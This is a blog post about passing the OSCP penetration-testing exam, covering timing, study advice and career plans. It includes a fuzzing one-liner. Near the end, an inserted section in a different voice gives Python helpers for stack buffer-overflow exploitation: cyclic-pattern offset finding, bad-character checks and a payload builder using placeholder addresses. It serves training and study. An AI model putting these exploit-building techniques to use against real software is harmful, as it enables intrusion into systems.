Hello again friends. This post is the fourth (and hopefully final) post of my small series of OSCP blogs discussing my progress and thoughts while taking part in the course. If you haven’t gotten a chance to check out my previous posts, you can find them here. This post will take a slightly different format compared to the others, since this post will be discussing my experience taking the exam (which was July 14th, two days ago).
If you read my previous post from last week, you may remember me saying that I did not expect to pass my first exam attempt. I was actively treating it as a “test run” for the real deal later in August, and as such wasn’t too emotionally invested in passing it the first time. I of course wanted to pass, but I did not go in with the expectation of doing so. Much to my surprise, though, I was able to obtain root/admin access on all 5 exam machines. With this, assuming my submitted report isn’t completely terrible, I should have the certification nailed. Without getting too “deep” and emotional, the moment I passed the 70 point threshold was the first time in a while that I was truly proud of myself.
The OSCP is a beginner certification. Getting it does not mean that you’re a talented hacker, or that you’re destined for greatness in the field. It does, however, solidify the notion that you can at least handle yourself in this very difficult industry, and you have the footing you need to start climbing the ladder. Having that self-assurance is a wonderful feeling, and it just makes you want to jump right back into the game.
The “Specifics” of the Exam (not really)
Obviously, due to non-disclosure agreements and whatnot, I can’t say too much regarding what I actually faced on the exam. I can, however, describe the general path I took, and some of the setbacks and advantages I found myself having. What made me “proud” of my exam attempt wasn’t just the fact that I owned all the boxes; it was the speed and methodology I demonstrated (sorry that sounded so gloatful, I don’t know how else to word it). My exam started at 6:00 PM Sunday night; by 11:30 PM, I terminated the exam VPN. The total time of my attempt was around 5 and a half hours, however the last hour or so was walking through each machine again to verify I had video footage and screenshots of the entire process. I had enough points to pass at around 9:30 PM, and had rooted all the boxes by 10:30 PM.
In my previous posts, I mentioned that time was my biggest concern; I confidently stated that if students were given a week instead of only 24 hours, most people would be able to pass. So, it was quite pleasing to see how little time came into play. There were certainly a number of elements contributing to this; much of it luck, but much of it solid preparation as well. One of the biggest contributors to my short completion time was my preparation for the buffer overflow. In my last post, I said that my buffer overflow practice times were sub-25 minutes, and that trend continued into my exam. The Buffer Overflow portion of the exam took me roughly 30 minutes, and I had absolutely no hiccups or issues during the process. Grabbing 25 points basically for free in the first 30 minutes is so crucial to passing the exam, and I’m very happy that I put in the preparation I did for the buffer overflow.
As for the other four boxes, I ran into very few issues enumerating, exploiting and establishing access. The most difficult part for me by far was the privilege escalation of the 25 point box; I didn’t dive into this part until I had enough points to pass from exploiting the other three boxes. Much to my surprise, I found the initial access portion of the other boxes to be more difficult than the privilege escalation portion. I think I got super lucky though, because the privilege escalation vectors were all things that I was pretty familiar with and comfortable doing. Had this not been the case, my exam results may have been a different story.
Any Advice for us?
Yes, read. Read every exploit you run. You can tell just from the lab environment alone that Offensive Security LOVES making students modify public proof of concept code to make things work; and for good reason. If you’re the type of person who grabs a piece of code and runs it without thinking, you will fail this exam. In both my lab time and my exam, there were so many cases where slight modifications to exploit code had to be made. Neglecting to do so will make you miss out on perfectly valid attack vectors. Every exploit I ran I knew EXACTLY what it was doing; I knew why the target was vulnerable, I knew conceptually how to exploit the vulnerability, and I knew how the exploit code I had was turning that conceptual exploitation into action. If you’re running an exploit without at the VERY least understanding what’s going on conceptually, you’re selling yourself short and it will eventually come back to bite you. Not only that, but debugging and fixing potential issues with the exploit code will be a near impossible task if you have no idea what’s going on.
What’s next for you?
I have no idea. Well, I have some ideas, but not really. For many, including myself, the OSCP is thought to be the gateway to the red team/pentesting world. Because of this, all your time before taking the OSCP is dedicated to preparing FOR the OSCP; that’s why I did HackTheBox, that’s why I did Vulnhub, that’s why I did everything. The OSCP was my target, and it has been for a while. Now that I have potentially crossed that gateway, I’m sort of in this state of not knowing what to do next. Life is so much easier when there are tangible, defined goals to reach; that’s why certifications can be so helpful in starting your career. However, now that a lot of the entry level stuff is over for me, my goals are becoming less and less defined. One tangible goal I want to achieve is having an official CVE to my name. For the bigwigs in the industry, I’m sure having a CVE with your name on it is mundane and a bit uninspiring. However, as a fresh new idiot coming into the industry, I would love to see my name on the MITRE website for finding a vulnerability. The problem is, where do I start? Where should I even go to look for vulnerable applications? Should I target web apps or binaries? What even is the process for registering a CVE? Am I even close to competent enough to find vulnerabilities? As you can see, achieving this goal is a lot more nuanced and opaque than the goal of “own the 5 OSCP Exam systems.”
I would also like to say, and I mentioned this in a previous post, that my experience taking the OSCP has shifted my overall career aspirations in a direction I did not expect. Before taking the OSCP, I was all about the operational side of things: Command & Control frameworks, OPSEC, network pivoting, covert infrastructure; these were the sort of things I was interested in. The idea of exploit development or bug hunting felt very “slow” and stylistically not for me. I was perfectly content letting the smarter people discover these obscure bugs and write these beautiful exploits for me; you exploit devs can craft the weapons, I just want to pull the trigger. However, throughout the OSCP I’ve felt an internal shift pushing me to think more about what role I really want to play in the industry.
To put it simply, I fell in love with reading and understanding exploit code. Prior to the OSCP, I was very much a “fire and forget” type of person: the very same type of person I criticized in the last section. However, the OSCP pushed me to start taking a peek into what’s really going on in these exploits, and I’ve been hooked ever since. Finding a vulnerability and writing a PoC exploit for it, a process that months ago would have bored me, now has me intrigued to no end. Running a sophisticated red team operation is really cool, and I’m sure it is an immensely satisfying experience. You know what is probably even more satisfying though? Building exploits that enable hundreds of these red team operations to succeed; finding and reporting vulnerabilities in applications, effectively safeguarding the thousands of people, companies and governments that may use said application; submitting a CVE that inevitably shows up in the threat intelligence feeds of thousands of SOCs. Those sound pretty damn amazing.
So, in summary, I plan on dabbling much more in the vulnerability research and exploit development side of things. I will still remain active on platforms like HackTheBox and keep up my operational skills. However, I’m starting to get the sense that maybe my true calling is finding and building the rifle instead of firing it; I guess only time will tell.
Quick OSCP Review
There is a near unanimous agreement in the industry that the OSCP is one of the most respected certifications out there. That is not a coincidence, that is not an accident. The OSCP doesn’t just throw information at you like the CEH, Security+ or GSEC does. It doesn’t try to teach you how to be a hacker: it instead trains you to think like one. After you take the OSCP, you’ll find yourself looking at everything you do on a computer differently. You’ll start asking why things work the way they do, instead of just accepting that they do. You’ll naturally look for kinks in the armor instead of the shininess of its plating. Every text field you find will be instinctively faced with an XSS or SQL Injection attempt; every command line argument will be given `$(python -c "print('A' * 5000)")` at least once. If you have any aspirations of breaking into the security field, blue team or red, the OSCP will build you a foundation that will likely serve you well for your entire career. The OSCP isn’t the best certification in the industry because people say it is. The OSCP is the best certification in the industry because the OSCP is the best certification in the industry. Take the course.
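Since the buffer overflow box is where the "free" 25 points come from (see the exam walkthrough above), and since `'A' * 5000` is only the first step of that workflow, here is an added example, not code from the author or from the course, of the next two steps a practitioner drills until they are automatic: replacing the run of A's with a cyclic pattern so the value that lands in EIP gives the exact offset of the saved return address, and checking a byte ladder against what the debugger shows to spot bad characters. It is a dependency-free reimplementation of what Metasploit's `pattern_create.rb` / `pattern_offset.rb` do; the EIP value, return address and shellcode bytes in the usage lines are constructed placeholders, not values from any real target.

```python
#!/usr/bin/env python3
"""Cyclic-pattern and bad-character helpers for the classic stack-overflow workflow.

Added example (not from the original post). Stand-in for pattern_create.rb /
pattern_offset.rb; every value used below is a constructed placeholder.
"""
import string
import struct

UPPER = string.ascii_uppercase
LOWER = string.ascii_lowercase
DIGITS = string.digits


def cyclic_pattern(length: int) -> bytes:
    """Return `length` bytes of the Aa0Aa1Aa2...Ab0 pattern.

    Every 4-byte window is unique within the first 26*26*10*3 = 20280 bytes,
    which comfortably covers the 5000-byte crash buffers seen in practice.
    """
    out = bytearray()
    for up in UPPER:
        for lo in LOWER:
            for dg in DIGITS:
                out += (up + lo + dg).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("requested length exceeds the unique pattern space (20280)")


def pattern_offset(value, length: int = 20280):
    """Locate the EIP value from the debugger inside the pattern.

    Accepts the 32-bit value as an int (0x39654138, as shown in the register
    pane) or as the 4 raw bytes in memory order. A little-endian EIP of
    0x39654138 is b'8Ae9' in memory, so the int form is packed '<I' first.
    Returns the 0-based offset, or None if the value is not in the pattern.
    """
    needle = struct.pack("<I", value) if isinstance(value, int) else bytes(value)
    idx = cyclic_pattern(length).find(needle)
    return idx if idx != -1 else None


def first_badchar(sent: bytes, observed: bytes):
    """Compare the byte ladder you sent (\\x01..\\xff) with the bytes the
    debugger shows on the stack. The first byte that is altered or missing
    is a bad character; returns it, or None if the whole ladder survived.
    Drop that byte from the ladder and repeat until None comes back.
    """
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def build_payload(offset: int, ret_addr: int, shellcode: bytes,
                  nop_sled: int = 16, total: int = 5000) -> bytes:
    """Assemble junk + return address + NOP sled + shellcode, padded to `total`.

    ret_addr is packed little-endian (a JMP ESP found in a non-rebased module;
    the value passed in the usage below is a placeholder, not a real address).
    """
    buf = (b"A" * offset + struct.pack("<I", ret_addr)
           + b"\x90" * nop_sled + shellcode)
    if len(buf) > total:
        raise ValueError("payload exceeds the crash length that was fuzzed")
    return buf + b"C" * (total - len(buf))


if __name__ == "__main__":
    # Step 1: crash with a pattern instead of 'A' * 5000.
    crash = cyclic_pattern(5000)
    # Step 2: the debugger shows EIP = 0x39654138 (placeholder value).
    off = pattern_offset(0x39654138)
    print("EIP offset:", off)  # 146
    # Step 3: constructed bad-char check where \x0a was swallowed by the target.
    ladder = bytes(range(1, 256))
    print("bad char:", hex(first_badchar(ladder, ladder.replace(b"\x0a", b""))))
    # Step 4: final buffer with placeholder JMP ESP and INT3 "shellcode".
    payload = build_payload(off, 0x625011AF, b"\xcc" * 4)
    print("payload length:", len(payload), "EIP bytes:", payload[off:off + 4].hex())
```

The offset 146 for `0x39654138` is the same answer `pattern_offset.rb -q 39654138` gives, which is a quick way to sanity-check the helper before trusting it on exam day. Keep the bad-character loop honest: after removing a byte from the ladder, send the shorter ladder again, because a second bad character hides behind the first truncation.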
So, that’s all I got. As usual, sorry for the grandioseness; proportionality has never been my strong suit. I hope these blog posts were informative, helpful or entertaining, and I genuinely appreciate all of you who followed along and expressed a genuine interest in my progress. Feel free to contact me on twitter if you have any questions. Thanks for reading 🙂
Discord Channel: https://discord.gg/CCZCJCu